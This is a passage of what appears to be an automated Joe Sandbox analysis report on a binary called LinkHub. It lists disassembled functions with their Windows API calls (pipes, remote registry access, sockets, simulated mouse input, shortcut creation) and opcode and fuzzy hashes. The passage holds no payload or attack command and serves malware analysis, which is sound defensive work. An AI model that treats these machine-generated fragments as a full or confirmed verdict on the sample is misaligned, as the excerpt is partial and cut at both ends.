                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                        • String ID:
                                                                                        • API String ID: 3761583154-0
                                                                                        • Opcode ID: 8b2d83085d9365c60fe2835eb4f7d1cd5cabb3f40c21853f8a08b03c12fecff8
                                                                                        • Instruction ID: b745abb626c125a23e5ad19806441ca67242ad6a8a9a422b86397cf2357fc6dd
                                                                                        • Opcode Fuzzy Hash: 8b2d83085d9365c60fe2835eb4f7d1cd5cabb3f40c21853f8a08b03c12fecff8
                                                                                        • Instruction Fuzzy Hash: 0D21C875610105BFDB10DFB8ECC9DAA77ECEB093607408225F905CB1A1DA70EC91CB65
                                                                                        Function 00270E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00270E99
                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00270ED5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHandlePipe
                                                                                        • String ID: nul
                                                                                        • API String ID: 1424370930-2873401336
                                                                                        • Opcode ID: 86c7de10c0f6c77e0745b2391fa7371cc5fe8898bb5b430f16aec809fbfe90b9
                                                                                        • Instruction ID: 1cbbd586f9b172f62945f463f85e3d78cdbf69abc4977cea124bfe17d5d63949
                                                                                        • Opcode Fuzzy Hash: 86c7de10c0f6c77e0745b2391fa7371cc5fe8898bb5b430f16aec809fbfe90b9
                                                                                        • Instruction Fuzzy Hash: 4F21917451030AEBDB309F25DC84A9A77E8BF54320F208A19FCA9D72D0DBB09864DB51
                                                                                        Function 00270F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00270F6D
                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00270FA8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHandlePipe
                                                                                        • String ID: nul
                                                                                        • API String ID: 1424370930-2873401336
                                                                                        • Opcode ID: 4fb7eab6c7ff9c9dbfe10e30f2189842f5110067ebc9cbd9fe5c8632ad51991c
                                                                                        • Instruction ID: 7118d258f49c4186cb834dcbf6edfe21813187d7efad4feb024a2cf9ec12e114
                                                                                        • Opcode Fuzzy Hash: 4fb7eab6c7ff9c9dbfe10e30f2189842f5110067ebc9cbd9fe5c8632ad51991c
                                                                                        • Instruction Fuzzy Hash: 8121B235510306DBDB308F689C45B9E77E8BF55720F208A1AFCA5E32D0DBB098A4EB51
                                                                                        Function 00294B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00207873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 002078B1
                                                                                          • Part of subcall function 00207873: GetStockObject.GDI32(00000011), ref: 002078C5
                                                                                          • Part of subcall function 00207873: SendMessageW.USER32(00000000,00000030,00000000), ref: 002078CF
                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00294BB0
                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00294BBD
                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00294BC8
                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00294BD7
                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00294BE3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                        • String ID: Msctls_Progress32
                                                                                        • API String ID: 1025951953-3636473452
                                                                                        • Opcode ID: 55a750c7d3ff0084f213a95015a9cbeb745450ac08c6792627b3e068941b01b5
                                                                                        • Instruction ID: c8ba090fd91a0152d583c32c292d216b601f77b06416388886a462b6c55429f5
                                                                                        • Opcode Fuzzy Hash: 55a750c7d3ff0084f213a95015a9cbeb745450ac08c6792627b3e068941b01b5
                                                                                        • Instruction Fuzzy Hash: 001186B155021EBEEF119FA5CC85EEB7F5DEF09798F014111B618E6090CA72DC21DBA4
                                                                                        Function 00266078 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memcmp
                                                                                        • String ID: j`&
                                                                                        • API String ID: 2931989736-233929150
                                                                                        • Opcode ID: b1eaefa2fbeed25d8a8d8dd5fb4c76896ceec385e5cdf7a7a11cfad45598b455
                                                                                        • Instruction ID: 7d610e67a4e08872a4878adf7ef8d8c78c56716e4c752927aba081220ea28818
                                                                                        • Opcode Fuzzy Hash: b1eaefa2fbeed25d8a8d8dd5fb4c76896ceec385e5cdf7a7a11cfad45598b455
                                                                                        • Instruction Fuzzy Hash: B701B9A16303157B96105A505D86FABB35DAFA239CF004431FD059A241EB71ED70C5A1
                                                                                        Function 0026E30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0026E328
                                                                                        • LoadStringW.USER32(00000000), ref: 0026E32F
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0026E345
                                                                                        • LoadStringW.USER32(00000000), ref: 0026E34C
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0026E390
                                                                                        Strings
                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 0026E36D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString$Message
                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                        • API String ID: 4072794657-3128320259
                                                                                        • Opcode ID: ce5ca0352cd8b3cbcb3bbe7766ca5334695dc61958119691337ffa43bc8da2ae
                                                                                        • Instruction ID: d50b260b17b58c3798692b0fc6aa5fd80aa512b9e117b55aa1c54df7804b296a
                                                                                        • Opcode Fuzzy Hash: ce5ca0352cd8b3cbcb3bbe7766ca5334695dc61958119691337ffa43bc8da2ae
                                                                                        • Instruction Fuzzy Hash: F501A2F69102087FEB109BA4ED8DEE6377CDB08300F404196B70AE6041E6749E849F70
                                                                                        Function 00271312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00271322
                                                                                        • EnterCriticalSection.KERNEL32(00000000,?), ref: 00271334
                                                                                        • TerminateThread.KERNEL32(00000000,000001F6), ref: 00271342
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00271350
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0027135F
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0027136F
                                                                                        • LeaveCriticalSection.KERNEL32(00000000), ref: 00271376
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 3495660284-0
                                                                                        • Opcode ID: 8b94038ea6a9089677a087ce66dd0d1620cb678fc7f62893e229a1c790353e8e
                                                                                        • Instruction ID: 314b889cf719c03240aa7bccef60d48569b6aadcd4055730ad0bad2e99f6afc1
                                                                                        • Opcode Fuzzy Hash: 8b94038ea6a9089677a087ce66dd0d1620cb678fc7f62893e229a1c790353e8e
                                                                                        • Instruction Fuzzy Hash: 20F0EC36442612BBD7411F54FE8DBD6BB39FF04306F801162F101918A1C7759871EF90
                                                                                        Function 002826BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 0028281D
                                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0028283E
                                                                                        • WSAGetLastError.WSOCK32 ref: 0028284F
                                                                                        • htons.WSOCK32(?,?,?,?,?), ref: 00282938
                                                                                        • inet_ntoa.WSOCK32(?), ref: 002828E9
                                                                                          • Part of subcall function 0026433E: _strlen.LIBCMT ref: 00264348
                                                                                          • Part of subcall function 00283C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0027F669), ref: 00283C9D
                                                                                        • _strlen.LIBCMT ref: 00282992
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                        • String ID:
                                                                                        • API String ID: 3203458085-0
                                                                                        • Opcode ID: d14010af2b975fb5e838a66ce45e6b09a32490c9455d1b83a8123ebf30c5cda4
                                                                                        • Instruction ID: 7e4e007c8294c97a49603c5626a1b2ad11365525e3243c93cb58fc78a8e1d2f0
                                                                                        • Opcode Fuzzy Hash: d14010af2b975fb5e838a66ce45e6b09a32490c9455d1b83a8123ebf30c5cda4
                                                                                        • Instruction Fuzzy Hash: 74B1DF39614301AFD324EF24C885E2AB7A5AF84318F64854CF4564B2E3DB71ED6ACB91
                                                                                        Function 00230527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __allrem.LIBCMT ref: 0023042A
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00230446
                                                                                        • __allrem.LIBCMT ref: 0023045D
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0023047B
                                                                                        • __allrem.LIBCMT ref: 00230492
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002304B0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                        • String ID:
                                                                                        • API String ID: 1992179935-0
                                                                                        • Opcode ID: 675459f4f124bd2af17bf05e9c9e87198950a75667ee82f7844c946ca9c63f73
                                                                                        • Instruction ID: b559b9e8e2ded274fb3085b03cb7af13b2af8e899af514d1b28b990072689252
                                                                                        • Opcode Fuzzy Hash: 675459f4f124bd2af17bf05e9c9e87198950a75667ee82f7844c946ca9c63f73
                                                                                        • Instruction Fuzzy Hash: 0F811BF2A207069BD724AF69CCD1B6B73B8AF44724F24412AF611D7681E770DE218F64
                                                                                        Function 00236571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00228649,00228649,?,?,?,002367C2,00000001,00000001,8BE85006), ref: 002365CB
                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,002367C2,00000001,00000001,8BE85006,?,?,?), ref: 00236651
                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0023674B
                                                                                        • __freea.LIBCMT ref: 00236758
                                                                                          • Part of subcall function 00233B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00220165,?,?,002711D9,0000FFFF), ref: 00233BC5
                                                                                        • __freea.LIBCMT ref: 00236761
                                                                                        • __freea.LIBCMT ref: 00236786
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1414292761-0
                                                                                        • Opcode ID: 36f880c2defd9d6e5a4d6ba5a588be5835c3c4be575d91dafcfe82ffe6558739
                                                                                        • Instruction ID: 3ce450d2761229e5b37a211ca484be8d2efa8316985d53c509defe94f7cd3bfe
                                                                                        • Opcode Fuzzy Hash: 36f880c2defd9d6e5a4d6ba5a588be5835c3c4be575d91dafcfe82ffe6558739
                                                                                        • Instruction Fuzzy Hash: C751E5F2630206BBDB258F64CC89EAAB7ADEB40754F548669F914D6140EB74DC60CA60
                                                                                        Function 0028C63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
                                                                                          • Part of subcall function 0028D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0028C10E,?,?), ref: 0028D415
                                                                                          • Part of subcall function 0028D3F8: _wcslen.LIBCMT ref: 0028D451
                                                                                          • Part of subcall function 0028D3F8: _wcslen.LIBCMT ref: 0028D4C8
                                                                                          • Part of subcall function 0028D3F8: _wcslen.LIBCMT ref: 0028D4FE
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0028C72A
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0028C785
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0028C7CA
                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0028C7F9
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0028C853
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0028C85F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                        • String ID:
                                                                                        • API String ID: 1120388591-0
                                                                                        • Opcode ID: a7802a9c19cb30253198153658b54dc99de3bf5e36f105ded1adf4ba5b992134
                                                                                        • Instruction ID: 7e3743a226f91383653a8ca88604a1ecb2db71c1d2af7eb089f2a87ad5bd4657
                                                                                        • Opcode Fuzzy Hash: a7802a9c19cb30253198153658b54dc99de3bf5e36f105ded1adf4ba5b992134
                                                                                        • Instruction Fuzzy Hash: BE819C74229341AFC715EF24C885E2ABBE9BF84308F14849CF4594B2A2CB31ED15CFA1
                                                                                        Function 0026009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(00000035), ref: 002600A9
                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00260150
                                                                                        • VariantCopy.OLEAUT32(00260354,00000000), ref: 00260179
                                                                                        • VariantClear.OLEAUT32(00260354), ref: 0026019D
                                                                                        • VariantCopy.OLEAUT32(00260354,00000000), ref: 002601A1
                                                                                        • VariantClear.OLEAUT32(?), ref: 002601AB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearCopy$AllocInitString
                                                                                        • String ID:
                                                                                        • API String ID: 3859894641-0
                                                                                        • Opcode ID: e77c8a91321deb79a7c604be8fede684fb58e4bb3f6064181f3c1d95bc929b38
                                                                                        • Instruction ID: 0fb4677e00832c96aca44fd28d7dfbcac9df05b294900dfceb3c511063d601f1
                                                                                        • Opcode Fuzzy Hash: e77c8a91321deb79a7c604be8fede684fb58e4bb3f6064181f3c1d95bc929b38
                                                                                        • Instruction Fuzzy Hash: 5151FB75930310E6CF20AF6598D9B2AB3A5EF45310F209447FD06DF296DBB09CA0EB56
                                                                                        Function 00276ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _wcslen.LIBCMT ref: 00276F21
                                                                                        • CoInitialize.OLE32(00000000), ref: 0027707E
                                                                                        • CoCreateInstance.OLE32(002A0CC4,00000000,00000001,002A0B34,?), ref: 00277095
                                                                                        • CoUninitialize.OLE32 ref: 00277319
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                        • String ID: .lnk
                                                                                        • API String ID: 886957087-24824748
                                                                                        • Opcode ID: f7bc56428bb6ef63c7e56d9f3da355ee4bebcba7ba32949a6ca640e346541944
                                                                                        • Instruction ID: d78c2bf8184c299b73c2f304661a4346f80ed19d1f5422bcb3b65a081414a142
                                                                                        • Opcode Fuzzy Hash: f7bc56428bb6ef63c7e56d9f3da355ee4bebcba7ba32949a6ca640e346541944
                                                                                        • Instruction Fuzzy Hash: 98D15A71628301AFC310EF24C881E6BB7E8FF99704F40895DF585972A2DB71E955CB92
                                                                                        Function 00298C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0025FBEF,00000000,?,?,00000000,?,002439E2,00000004,00000000,00000000), ref: 00298CA7
                                                                                        • EnableWindow.USER32(?,00000000), ref: 00298CCD
                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00298D2C
                                                                                        • ShowWindow.USER32(?,00000004), ref: 00298D40
                                                                                        • EnableWindow.USER32(?,00000001), ref: 00298D66
                                                                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00298D8A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 642888154-0
                                                                                        • Opcode ID: 65f8f60123a314438c38269c9cbda53da1046ec692605adadc687bb4e6130433
                                                                                        • Instruction ID: 9bf892e06d445ca467eba01157bc3ca9b0464e9c113b714be9bdb791568f044c
                                                                                        • Opcode Fuzzy Hash: 65f8f60123a314438c38269c9cbda53da1046ec692605adadc687bb4e6130433
                                                                                        • Instruction Fuzzy Hash: 09418430602245EFDF29DF24E999BA57BF1FF56304F1C40AAE5085B2A2DB316C59CB60
                                                                                        Function 00282D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(?,?,00000000), ref: 00282D45
                                                                                          • Part of subcall function 0027EF33: GetWindowRect.USER32(?,?), ref: 0027EF4B
                                                                                        • GetDesktopWindow.USER32 ref: 00282D6F
                                                                                        • GetWindowRect.USER32(00000000), ref: 00282D76
                                                                                        • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00282DB2
                                                                                        • GetCursorPos.USER32(?), ref: 00282DDE
                                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00282E3C
                                                                                        Memory Dump Source
